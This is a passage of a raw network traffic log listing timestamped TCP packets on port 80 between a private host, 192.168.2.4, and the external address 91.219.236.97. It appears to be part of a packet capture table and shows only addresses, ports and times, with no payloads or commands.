Oct 29, 2021 20:51:19.735399008 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.735400915 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.735415936 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.735424995 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.735433102 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.735449076 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.735465050 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.735466003 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.735481977 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.735497952 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.735505104 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.735515118 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.735532045 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.735539913 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.735548019 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.735557079 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.735565901 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.735588074 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.735615015 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.735632896 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.735651016 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.735655069 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.735666990 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.735683918 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.735688925 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.735701084 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.735718012 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.735719919 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.735733986 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.735750914 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.735754967 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.735769033 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.735785007 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.735790014 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.735815048 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.735825062 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.735831022 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.735867977 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.735879898 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.735894918 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.735932112 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.735935926 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.735953093 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.735970020 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.735991955 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.735997915 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.736047029 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.736057043 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.736072063 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.736089945 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.736109018 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.736109018 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.736125946 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.736141920 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.736145020 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.736159086 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.736176014 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.736185074 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.736192942 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.736208916 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.736212015 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.736232042 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.736249924 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.736249924 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.736267090 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.736284018 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.736293077 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.736300945 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.736316919 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.736325979 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.736351013 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.736377001 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.736394882 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.736423016 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.736438036 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.736439943 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.736471891 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.767882109 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.767910004 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.768024921 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.768238068 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.768259048 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.768275023 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.768292904 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.768309116 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.768322945 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.768326044 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.768345118 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.768357038 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.768359900 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.768378973 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.768387079 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.768397093 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.768409014 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.768414974 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.768430948 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.768431902 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.768450022 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.768462896 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.768466949 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.768484116 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.768497944 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.768498898 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.768515110 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.768532038 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.768544912 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.768547058 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.768564939 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.768580914 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.768582106 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.768598080 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.768604040 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.768615961 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.768630981 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.768635988 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.768650055 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.768665075 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.768675089 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.768681049 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.768693924 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.768697977 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.768716097 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.768733025 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.768748999 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.768754959 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.768764973 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.768775940 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.768780947 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.768799067 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.768807888 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.768814087 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.768831015 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.768831968 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.768858910 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.768876076 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.768882036 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.768893957 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.768910885 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.768918037 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.768927097 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.768939018 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.768944025 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.768959999 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.768976927 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.768994093 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.768996000 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.769011021 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.769026995 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.769028902 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.769043922 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.769052982 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.769061089 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.769078970 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.769085884 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.769094944 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.769110918 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.769119978 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.769126892 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.769143105 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.769143105 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.769160032 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.769176006 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.769186974 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.769190073 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.769207001 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.769210100 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.769222975 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.769237995 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.769246101 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.769253969 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.769268990 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.769269943 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.769287109 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.769319057 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.821099043 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.821125031 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.821141005 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.821158886 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.821177959 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.821194887 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.821214914 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.821223974 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.821230888 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.821248055 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.821260929 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.821279049 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.821288109 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.821295977 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.821306944 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.821311951 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.821330070 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.821345091 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.821361065 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.821377039 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.821388960 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.821404934 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.821415901 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.821429014 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.821435928 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.821490049 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.821505070 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.821527958 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.821547031 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.821588039 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.823173046 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.823193073 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.823209047 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.823221922 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.823241949 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.823275089 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.823333025 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.823350906 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.823367119 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.823379993 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.823391914 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.823401928 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.823431969 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.823463917 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.823481083 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.823493958 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.823506117 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.823513031 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.823539972 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.823544979 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.823563099 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.823579073 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.823590040 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.823596001 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.823609114 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.823625088 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.823626041 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.823638916 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.823652029 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.823657036 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.823666096 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.823683023 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.823692083 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.823700905 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.823708057 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.823718071 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.823731899 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.823739052 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:19.823745012 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:19.823786974 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.097399950 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.152854919 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.206615925 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.245677948 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.245982885 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.246016979 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.246043921 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.246068954 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.246083021 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.246093988 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.246104956 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.246118069 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.246145964 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.246160030 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.246169090 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.246186018 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.246191978 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.246215105 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.246238947 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.246238947 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.246262074 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.246284962 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.246287107 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.246306896 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.246331930 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.246340036 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.246350050 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.246372938 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.246395111 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.246396065 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.246417046 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.246433020 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.246440887 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.246459961 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.246464968 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.246486902 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.246510983 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.246535063 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.246536016 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.246556997 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.246571064 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.246581078 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.246603012 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.246606112 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.246625900 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.246642113 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.246648073 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.246670008 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.246692896 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.246715069 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.246716022 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.246737957 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.246740103 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.246762037 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.246783972 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.246793985 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.246808052 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.246834993 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.246839046 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.246855021 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.246877909 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.246881962 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.246901035 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.246922016 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.246923923 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.246942043 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.246963024 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.246963978 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.246985912 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.247004986 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.247008085 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.247030973 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.247052908 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.247054100 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.247073889 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.247096062 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.247097015 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.247122049 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.247140884 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.247142076 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.247165918 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.247181892 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.247186899 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.247209072 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.247229099 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.247230053 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.247251987 CEST	80	49865	91.219.236.97	192.168.2.4
Oct 29, 2021 20:51:20.247267962 CEST	49865	80	192.168.2.4	91.219.236.97
Oct 29, 2021 20:51:20.247275114 CEST	80	49865	91.219.236.97	192.168.2.4
